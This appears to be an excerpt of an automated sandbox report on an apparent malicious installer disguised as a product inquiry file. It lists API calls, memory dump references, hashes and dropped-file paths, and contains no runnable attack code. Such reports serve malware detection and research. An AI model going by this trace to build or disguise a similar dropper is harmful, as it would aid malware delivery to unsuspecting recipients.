                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403455
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                        APIs
                                                                        • SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                        • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                                        • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                        • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,0040412A), ref: 0040435D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                        • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                                        • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                        • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                                                                        APIs
                                                                          • Part of subcall function 00405443: lstrlenW.KERNEL32(Completed,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                          • Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,Completed,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                          • Part of subcall function 00405443: lstrcatW.KERNEL32(Completed,00403385,00403385,Completed,00000000,00418EC0,004031E6), ref: 0040549E
                                                                          • Part of subcall function 00405443: SetWindowTextW.USER32(Completed,Completed), ref: 004054B0
                                                                          • Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                          • Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                          • Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                          • Part of subcall function 004059C4: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
                                                                          • Part of subcall function 004059C4: CloseHandle.KERNEL32(?), ref: 004059FA
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                          • Part of subcall function 0040687B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040688C
                                                                          • Part of subcall function 0040687B: GetExitCodeProcess.KERNEL32(?,?), ref: 004068AE
                                                                          • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2972824698-0
                                                                        • Opcode ID: 4bb0626c6d309173ea64b4d5ed0d06ef41df693354713ee685c49a69ef146aac
                                                                        • Instruction ID: 4d96ac15eb21dec6eadeffd875f927664214cc5c784fe1dba304e89e249c00b1
                                                                        • Opcode Fuzzy Hash: 4bb0626c6d309173ea64b4d5ed0d06ef41df693354713ee685c49a69ef146aac
                                                                        • Instruction Fuzzy Hash: 2CF09072A05112DBCB20EFA699849EE76F4EF00319B21453BE512B21D0C3BC4E428A6E
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404871
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0040489B
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040494C
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404957
                                                                        • lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404989
                                                                        • lstrcatW.KERNEL32(?,: Completed), ref: 00404995
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049A7
                                                                          • Part of subcall function 00405A25: GetDlgItemTextW.USER32(?,?,00000400,004049DE), ref: 00405A38
                                                                          • Part of subcall function 0040668A: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                          • Part of subcall function 0040668A: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                          • Part of subcall function 0040668A: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                          • Part of subcall function 0040668A: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                        • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404A6A
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A85
                                                                          • Part of subcall function 00404BDE: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                          • Part of subcall function 00404BDE: wsprintfW.USER32 ref: 00404C88
                                                                          • Part of subcall function 00404BDE: SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: : Completed$A$C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener
                                                                        • API String ID: 2624150263-3171304875
                                                                        • Opcode ID: ac22eba4f4e0706a7aa2aa9248de87666ca7b8c05486c05dfef1647bf889efd6
                                                                        • Instruction ID: d667353cedc46192e8d163e6c277cef07b4b15ed6202573052c67ff26174fc6d
                                                                        • Opcode Fuzzy Hash: ac22eba4f4e0706a7aa2aa9248de87666ca7b8c05486c05dfef1647bf889efd6
                                                                        • Instruction Fuzzy Hash: 02A194B1A00209ABDB11AFA5CD45AAF77B8EF84314F10803BF611B62D1D77C99418F6D
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B16
                                                                        • lstrcatW.KERNEL32(00425710,\*.*,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B5E
                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B81
                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B87
                                                                        • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B97
                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C37
                                                                        • FindClose.KERNEL32(00000000), ref: 00405C46
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFA
                                                                        • "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe", xrefs: 00405AED
                                                                        • \*.*, xrefs: 00405B58
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-2857527071
                                                                        • Opcode ID: 67b9ec69c0e463916132c7b91186ea2846ab1267717354fbf45f0053e7cb3cfe
                                                                        • Instruction ID: 6d977be599016ad98dbda8fdbba8a7eaa4df1add9cdfb0a4bac278b573c77b22
                                                                        • Opcode Fuzzy Hash: 67b9ec69c0e463916132c7b91186ea2846ab1267717354fbf45f0053e7cb3cfe
                                                                        • Instruction Fuzzy Hash: 1A41D530904A18AAEB216B65DC8AABF7678EF41718F10413FF801B11D1D77C5AC1DEAE
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Militrattacheens, xrefs: 00402261
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Militrattacheens
                                                                        • API String ID: 542301482-3543417879
                                                                        • Opcode ID: 9028cb47e19cf1b70454ec10b47384f445ee4d6b9344bc9dc860c9e32927463d
                                                                        • Instruction ID: ffb8b13858b70c1ff9263f9ad1230fafd83ab24b06fb2866c5c71dc23dde5df7
                                                                        • Opcode Fuzzy Hash: 9028cb47e19cf1b70454ec10b47384f445ee4d6b9344bc9dc860c9e32927463d
                                                                        • Instruction Fuzzy Hash: 1F411675A00209AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 81065cc4807e8c0eb5cb78fe71d914af7d2d6c3a5ef350cf710d709c8a229f3e
                                                                        • Instruction ID: 8edab8899b0228974304dfa76bdc964f5a5729fff09c5fb89d7f9bd6055596d6
                                                                        • Opcode Fuzzy Hash: 81065cc4807e8c0eb5cb78fe71d914af7d2d6c3a5ef350cf710d709c8a229f3e
                                                                        • Instruction Fuzzy Hash: ADF05E71A041049AC700DFA4D9499AEB374EF10314F61457BE912F21E0D7B85E119B2A
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404DB5
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404DC2
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E0E
                                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E25
                                                                        • SetWindowLongW.USER32(?,000000FC,004053B7), ref: 00404E3F
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E53
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E67
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404E7C
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E88
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E9A
                                                                        • DeleteObject.GDI32(00000110), ref: 00404E9F
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ECA
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ED6
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F71
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FA1
                                                                          • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FB5
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404FE3
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FF1
                                                                        • ShowWindow.USER32(?,00000005), ref: 00405001
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405102
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405164
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405179
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040519D
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051C0
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004051D5
                                                                        • GlobalFree.KERNEL32(?), ref: 004051E5
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040525E
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405307
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405316
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405340
                                                                        • ShowWindow.USER32(?,00000000), ref: 0040538E
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405399
                                                                        • ShowWindow.USER32(00000000), ref: 004053A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 2564846305-813528018
                                                                        • Opcode ID: 8584f3799b0db8d261290d7efeb258875c9650e4874f8aded0a11708937f2ed0
                                                                        • Instruction ID: f13cb60032faeb06b1ff68bd0c1dc2f430bb97b794b1e627908efdb4cc4bd96d
                                                                        • Opcode Fuzzy Hash: 8584f3799b0db8d261290d7efeb258875c9650e4874f8aded0a11708937f2ed0
                                                                        • Instruction Fuzzy Hash: 04127DB0900609EFDF209F95CD45AAE7BB5FB84314F10817AFA10BA2E1D7798951CF58
                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040458E
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004045A2
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045BF
                                                                        • GetSysColor.USER32(?), ref: 004045D0
